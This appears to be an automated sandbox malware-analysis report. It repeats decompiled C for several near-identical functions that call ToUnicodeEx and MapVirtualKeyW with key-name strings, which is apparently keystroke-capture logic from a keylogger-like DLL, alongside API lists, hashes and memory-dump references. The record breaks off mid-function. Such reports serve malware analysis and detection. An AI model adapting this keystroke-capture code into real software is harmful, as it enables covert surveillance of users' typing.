0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad
API String ID: 783433895-3409537306
Opcode ID: 60778e521d3828b1ac1843a7a9634b6a047fd589048255cd8357fb5c81321ec6
Instruction ID: 6a83edecdd09e7cf6567bb4e12f854a4e7878076b54641c7a23d56263201f881
Opcode Fuzzy Hash: 60778e521d3828b1ac1843a7a9634b6a047fd589048255cd8357fb5c81321ec6
Instruction Fuzzy Hash: 6C31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F6489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100071DE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100071DE(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, 0x10007998);
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100071de
0x100071de
0x100071e5
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad
API String ID: 783433895-3409537306
Opcode ID: f4a8bbbe697522b7cb839a06d61e9bc714ef5e6879113a86d806209f1cea9cc7
Instruction ID: b1ba141e3efd31ddec5efd417cab8458379c596905762369eb56fe309a4f9560
Opcode Fuzzy Hash: f4a8bbbe697522b7cb839a06d61e9bc714ef5e6879113a86d806209f1cea9cc7
Instruction Fuzzy Hash: CA31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F6489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100071EF, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100071EF(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, 0x100079a0);
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100071ef
0x100071ef
0x100071f6
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad
API String ID: 783433895-3409537306
Opcode ID: 39b03309cb925559adc94f9655e3a5a9f0f01a3343eadd4f371930683951da97
Instruction ID: 8aa69b91d737cd1935abe9d1b170b80890827fc85faedbd8b906090cccbd213a
Opcode Fuzzy Hash: 39b03309cb925559adc94f9655e3a5a9f0f01a3343eadd4f371930683951da97
Instruction Fuzzy Hash: EB31C2B8F042545BF722C7658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45C761

Uniqueness

Uniqueness Score: -1.00%

Function 10007200, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007200(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, 0x100079a8);
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007200
0x10007200
0x10007207
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad
API String ID: 783433895-3409537306
Opcode ID: a162cc495929e47f1e2b8db7e60090edff99d25f5f2755788ca8ad98c3a46845
Instruction ID: da241092db117cf8670937f7e946dbca7f1b2fe6bc2353ea6322e4b84d0426b2
Opcode Fuzzy Hash: a162cc495929e47f1e2b8db7e60090edff99d25f5f2755788ca8ad98c3a46845
Instruction Fuzzy Hash: B031C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB62

Uniqueness

Uniqueness Score: -1.00%

Function 10007211, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007211(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, 0x100079b0);
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007211
0x10007211
0x10007218
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad
API String ID: 783433895-3409537306
Opcode ID: 6fb5cf8c127330519ac590d7b260d6f1972dd4d19386bf32214d38e0e73a7627
Instruction ID: 13d384bfb7d80fcaab74c7c21edcce233b970dd7a99a864e689220d7ee6072be
Opcode Fuzzy Hash: 6fb5cf8c127330519ac590d7b260d6f1972dd4d19386bf32214d38e0e73a7627
Instruction Fuzzy Hash: E831C0B8F042545BF722CB658C85B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007222, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007222(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, 0x100079b8);
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007222
0x10007222
0x10007229
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad
API String ID: 783433895-3409537306
Opcode ID: b4064cf9196f1bd766f61690eec419dae147e0aac919e4e137b35742a66dca64
Instruction ID: bead1d8953916fe6a2caf6aa6abcbb8af6aaada5367ea8c14ed574beb6cc7c0d
Opcode Fuzzy Hash: b4064cf9196f1bd766f61690eec419dae147e0aac919e4e137b35742a66dca64
Instruction Fuzzy Hash: E631C0B8F042545BF722CB658C85B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007233, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007233(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, 0x100079c0);
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
